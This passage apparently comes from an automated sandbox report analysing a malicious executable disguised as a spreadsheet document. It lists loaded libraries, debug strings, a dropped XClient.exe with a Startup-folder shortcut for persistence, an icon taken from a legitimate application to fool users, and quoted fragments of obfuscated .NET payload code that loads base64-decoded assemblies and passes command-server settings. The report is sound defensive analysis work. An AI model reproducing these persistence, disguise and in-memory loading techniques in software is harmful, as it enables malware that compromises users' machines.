              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
              Source: XClient.lnk.2.drLNK file: ..\..\..\..\..\XClient.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: rDoc5633276235623657_xls.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: rDoc5633276235623657_xls.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: rDoc5633276235623657_xls.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: C:\Windows\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Data.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbeTOT source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BC0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2659308931.0000000005BB0000.00000004.00000020.00020000.00000000.sdmp, XClient.exe.2.dr
              Source: Binary string: mscorlib.pdbq source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Core.ni.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Numerics.ni.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: HSDSDF32.pdbh source: rDoc5633276235623657_xls.exe
              Source: Binary string: System.Transactions.ni.pdbRSDSc source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdbH source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: mscorlib.ni.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BB0000.00000004.00000020.00020000.00000000.sdmp, XClient.exe.2.dr
              Source: Binary string: \??\C:\Windows\RegAsm.pdbp( source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.pdb8< source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Runtime.Serialization.ni.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\RegAsm.pdb0(G source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: mscorlib.pdbL} source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: mscorlib.pdb< source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: Microsoft.VisualBasic.pdbRSDSc source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: HSDSDF32.pdb source: rDoc5633276235623657_xls.exe
              Source: Binary string: C:\Windows\RegAsm.pdbpdbAsm.pdb source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: n0C:\Windows\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BC0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BC0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\exe\RegAsm.pdba source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Data.ni.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Configuration.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Xml.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: o.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: %%.pdb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BB0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp, WER8A2C.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbhk@ source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Drawing.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Management.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Xml.pdb@DHLPhl source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Data.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Management.ni.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Core.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Transactions.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: \??\C:\Windows\exe\RegAsm.pdbE source: RegAsm.exe, 00000002.00000002.2659308931.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegAsm.exe, 00000002.00000002.2659153420.0000000005A5A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Runtime.Serialization.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Core.pdbxm. source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Transactions.ni.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: RegAsm.exe, 00000002.00000002.2653222752.0000000001215000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Numerics.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Windows.Forms.pdbDN. source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.ni.pdb source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Data.pdb, source: WER8A2C.tmp.dmp.9.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WER8A2C.tmp.dmp.9.dr

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: rDoc5633276235623657_xls.exe, DyyVDbaRvM1YfIq9il.cs.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.bTWUCGjumGB3L(16777255)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.bTWUCGjumGB3L(16777256)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.bTWUCGjumGB3L(16777253))})
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 0.2.rDoc5633276235623657_xls.exe.2dcb45c.0.raw.unpack, Messages.cs.Net Code: Memory
              Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 0.2.rDoc5633276235623657_xls.exe.2dc2a1c.2.raw.unpack, Messages.cs.Net Code: Memory
              Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 0.2.rDoc5633276235623657_xls.exe.2dd3eb4.1.raw.unpack, Messages.cs.Net Code: Memory
              Source: rDoc5633276235623657_xls.exeStatic PE information: 0x9DC1522E [Fri Nov 14 00:19:58 2053 UTC]
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0666773F push dword ptr [esp+ecx*2-75h]; ret 2_2_06667743
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_066638AD push es; ret 2_2_066638B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0668E798 pushad ; ret 2_2_0668E7A1
              Source: rDoc5633276235623657_xls.exe, DyyVDbaRvM1YfIq9il.csHigh entropy of concatenated method names: 'D4r4O0AxSI', 'r0PUCGXjcJBvJ', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
              Source: rDoc5633276235623657_xls.exe, R2mIapWar4cwoqqx6Q.csHigh entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\XClient.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Icon mismatch, binary includes an icon from a different legit application in order to fool users
              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (92).png
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\858CCD728664FC98EE47 66DBE3B90371FE58CAA957E83C1C1F0ACCE941A36CF140A0F07E64403DD13303Jump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDoc5633276235623657_xls.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
